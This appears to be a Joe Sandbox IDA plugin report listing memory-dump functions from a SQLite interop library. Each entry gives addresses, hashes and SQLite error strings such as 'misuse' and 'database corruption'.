Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 58e285ee8bf0bbe11aea197a3a9d2ac173ccef14409c78b1a635b73b7b717261
Instruction ID: 51a2e4eef26af68c19baf0574877ff5a1987b2b56e5d319a20fa47c13aac3817
Opcode Fuzzy Hash: 58e285ee8bf0bbe11aea197a3a9d2ac173ccef14409c78b1a635b73b7b717261
Instruction Fuzzy Hash: ADF05E776187056B8300AF69E902946BBE8EB98624700803AEA59E7741FB35A62487A5

Function 6BC62B60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015BE4,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC62B83

Strings

%s at line %d of [%.10s], xrefs: 6BC62B7C
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC62B6D
misuse, xrefs: 6BC62B77

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 0b1eb3958ddeb7c1247fe34a254ef9fbc53262e8de54d3b2705567b19607f1e4
Instruction ID: 6647a3c2a94dd30edcc1d331ec635abc9708d74d02b6415fe6a6f44a7660cbf3
Opcode Fuzzy Hash: 0b1eb3958ddeb7c1247fe34a254ef9fbc53262e8de54d3b2705567b19607f1e4
Instruction Fuzzy Hash: A9F0A0B6A1860867CB00DEA89C43E9733588784714F000258BD1D9F2C1FA28DA2083E6

Function 6BC5D040 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A76F,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5D06B

Strings

%s at line %d of [%.10s], xrefs: 6BC5D064
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5D055
misuse, xrefs: 6BC5D05F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 93f0d12a3974d258c9dba25cb90051dd2605686afff7acc2f6df06f1185a92c4
Instruction ID: 0ec1ea12783f5e8ca2bd3199009b63d7e2ed339ca55382551feb29685b9cb506
Opcode Fuzzy Hash: 93f0d12a3974d258c9dba25cb90051dd2605686afff7acc2f6df06f1185a92c4
Instruction Fuzzy Hash: B4E0D176E593186B8710FF789D02D4677ECDB05724F0000DAED49E7341F975AA2042E6

Function 6BC61530 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A76F,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC6155B

Strings

%s at line %d of [%.10s], xrefs: 6BC61554
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC61545
misuse, xrefs: 6BC6154F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 8f86f35a8440139a8dab2ff02ad4cb809254e8fa4f3d37c4405f9e9a30fe9bc4
Instruction ID: a6e318438c3145d8ae014c8ebe44e0390f1fd542e2c085167ab7320c68ada816
Opcode Fuzzy Hash: 8f86f35a8440139a8dab2ff02ad4cb809254e8fa4f3d37c4405f9e9a30fe9bc4
Instruction Fuzzy Hash: 0BE09B76E593186B4700EF689D02D47B7A8DB15721F0040ABED45E7341F975AA2082E6

Function 6BC57ED0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AA32,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57F02

Strings

%s at line %d of [%.10s], xrefs: 6BC57EFB
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57EEC
misuse, xrefs: 6BC57EF6

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 646a0b3c379e718a6cb8edb45e9b28b7c7cc73ee57da8661b0b267ef69ed43ed
Instruction ID: e55b0e4af8379ce44d8426ee805c7e596855cbcf0ac69e1471079bc4d784fe81
Opcode Fuzzy Hash: 646a0b3c379e718a6cb8edb45e9b28b7c7cc73ee57da8661b0b267ef69ed43ed
Instruction Fuzzy Hash: 7CE0207796572427C510D7646D05E877B484B00B38F0001D6FD5DEF281F75C9AB052D6

Function 6BC58200 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A753,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC58228

Strings

%s at line %d of [%.10s], xrefs: 6BC58221
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC58212
misuse, xrefs: 6BC5821C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 013ef8d2c12d3ac53c069b982337849fe25a476d9caaae268f1fcafae86378e7
Instruction ID: 5bacd00ce597439caf8c4b2684ecadd160d7129a1549bb6f926b269359f10565
Opcode Fuzzy Hash: 013ef8d2c12d3ac53c069b982337849fe25a476d9caaae268f1fcafae86378e7
Instruction Fuzzy Hash: 65E0CD37B647146B4600EB75EC01C877798CB44778B404061FF4DEB642FE38E61102E6

Function 6BC57200 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B1C5,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57228

Strings

%s at line %d of [%.10s], xrefs: 6BC57221
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57212
misuse, xrefs: 6BC5721C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 80d24a180a108e285ed8c47301cda66eff9285d29f265bfe20ab98c1ecd93ee9
Instruction ID: fa233301ceb19eec2cf7bc3fd389d840de288d79d4e0984851ed05db9950bdbf
Opcode Fuzzy Hash: 80d24a180a108e285ed8c47301cda66eff9285d29f265bfe20ab98c1ecd93ee9
Instruction Fuzzy Hash: C4D0C2226A422826860026B56C02D973B888A00A79B4000A2FA4CEA542FA48962001E6

Function 6BC540E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 18COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000138CC,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC54100

Strings

%s at line %d of [%.10s], xrefs: 6BC540F9
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC540EA
misuse, xrefs: 6BC540F4

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 1f4885e435b9ceaee34da9dae94fc311aec67a4c7265487de31667bd3059c0bb
Instruction ID: fdd3000bad6af39ac19c339ae5e3733ff993e49f16db5d4b760cec41dc8ea90e
Opcode Fuzzy Hash: 1f4885e435b9ceaee34da9dae94fc311aec67a4c7265487de31667bd3059c0bb
Instruction Fuzzy Hash: B4D0A7716643086BC600FBA4AC02D433FE89700B18B0400A0B50CEF143F918D6201071

Function 6BC540A0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 18COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000138DA,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC540C0

Strings

%s at line %d of [%.10s], xrefs: 6BC540B9
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC540AA
misuse, xrefs: 6BC540B4

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: def68ac3795d4a23f26fde16c921a71552c90e4774db3b848b6bd39964229b1b
Instruction ID: 9a9c05f99e75c02c777c9cd81c5b7010f3e33de9f6442dce8c46df3c74a10939
Opcode Fuzzy Hash: def68ac3795d4a23f26fde16c921a71552c90e4774db3b848b6bd39964229b1b
Instruction Fuzzy Hash: 82D0C771768308AB9600ABE4DD42D477BD89754B28B0400A4B50DEF587F95DE6245175

Function 6BC52840 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 11COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00035481,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,6BC64773), ref: 6BC52853

Strings

%s at line %d of [%.10s], xrefs: 6BC5284C
database corruption, xrefs: 6BC52847
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC52841

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 3a74c377ff0f83e6cffa752215a19bf52619f9fb294e11e408a0648b1558413a
Instruction ID: b4303ca1e06711077a7d05e3cecb93c3e4dd3f2ebfbbdd6e836eabe7da61c685
Opcode Fuzzy Hash: 3a74c377ff0f83e6cffa752215a19bf52619f9fb294e11e408a0648b1558413a
Instruction Fuzzy Hash: C7B092E19A41403BE4146B649E0BF2325088320A29F110098790AAE1C7BE4C4A1801B3

Function 6BC52810 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 11COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B08A,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,6BCDD0C0), ref: 6BC52823

Strings

%s at line %d of [%.10s], xrefs: 6BC5281C
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC52811
misuse, xrefs: 6BC52817

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: a51a27e717a8c81b8c69da11bcf764e291c950fedddea1855a5bdde08ad48223
Instruction ID: 86414834bdecec89033fbdfa60c0f56a6cdbdf8b0c9ef33af9616661443c91b4
Opcode Fuzzy Hash: a51a27e717a8c81b8c69da11bcf764e291c950fedddea1855a5bdde08ad48223
Instruction Fuzzy Hash: 02B092E19645447BE8146B649D0BE631818C390B2AF1000AC7957AE1C7BD4C4A182172

Function 6BC527E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 11COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000E,%s at line %d of [%.10s],cannot open file,0000EAA9,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,6BC82A1E), ref: 6BC527F3

Strings

%s at line %d of [%.10s], xrefs: 6BC527EC
cannot open file, xrefs: 6BC527E7
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC527E1

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$cannot open file$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-1856461355
Opcode ID: 584b206bee38f130656b19ff6b3b12e394c39dc1810d54d59a3a9aa5e11391f0
Instruction ID: 00fa5d513299f462ec604d5dd8fb71383bf86242f2b6935b2dfcb46ffaf0cd93
Opcode Fuzzy Hash: 584b206bee38f130656b19ff6b3b12e394c39dc1810d54d59a3a9aa5e11391f0
Instruction Fuzzy Hash: C6B092D29A41803BF4146B74DE07F230408C310A29F100599780ABE2C7BD8C8A984172

Function 6BC4CBA0 Relevance: 6.4, APIs: 4, Instructions: 378COMMON

Download Yara Rule

APIs

SIffb8076c269e2a85.SQLITE.INTEROP(00000000), ref: 6BC4CC88

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iffb8076c269e2a85.
String ID:
API String ID: 1579666890-0
Opcode ID: 5854f4884815835e326f65c5a3d8c4674f5f47a16281f4f15a181ab6ad9c4fb6
Instruction ID: fe3dcc369a592058a1b72745597ac5566c8d5cfd83188e508c678495e46ac906
Opcode Fuzzy Hash: 5854f4884815835e326f65c5a3d8c4674f5f47a16281f4f15a181ab6ad9c4fb6
Instruction Fuzzy Hash: 16D1D071E251158FDB04CFA8C4806AFBBB1FB45314F1580AAE855AB361F73D9B89CB90

Function 6BC17460 Relevance: 6.2, APIs: 4, Instructions: 247COMMON

Download Yara Rule

APIs

SI9a326fe0ddbebf12.SQLITE.INTEROP(?,00000000,?,?,00000000,?,?,?), ref: 6BC1751B
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,00000000,?,?,?), ref: 6BC1752A
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC17617
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC176C6

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$I9a326fe0ddbebf12.
String ID:
API String ID: 1009568106-0
Opcode ID: 5e14eb54a6ed4c46e7d14a189a394f531bfb6e205610711e140f17605756cf97
Instruction ID: cb258044af7f0eb510e711ee538dd511cbfbb5529c23f2a20d659d9ae595b1ef
Opcode Fuzzy Hash: 5e14eb54a6ed4c46e7d14a189a394f531bfb6e205610711e140f17605756cf97
Instruction Fuzzy Hash: DC8183F19182059FD710CF68D880A5BB7E4BF49314F10856EF859A7301F739EA15DBA2

Function 6BC2D160 Relevance: 6.2, APIs: 4, Instructions: 226COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC2D1E4
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?,6BD087D4,6BC8DA3D,?), ref: 6BC2D32F
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2D3B1

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$_memset
String ID:
API String ID: 1480580083-0
Opcode ID: ea2129a3eff66618a711d39f0029aa65fb99054376f71f91636a187321f23d88
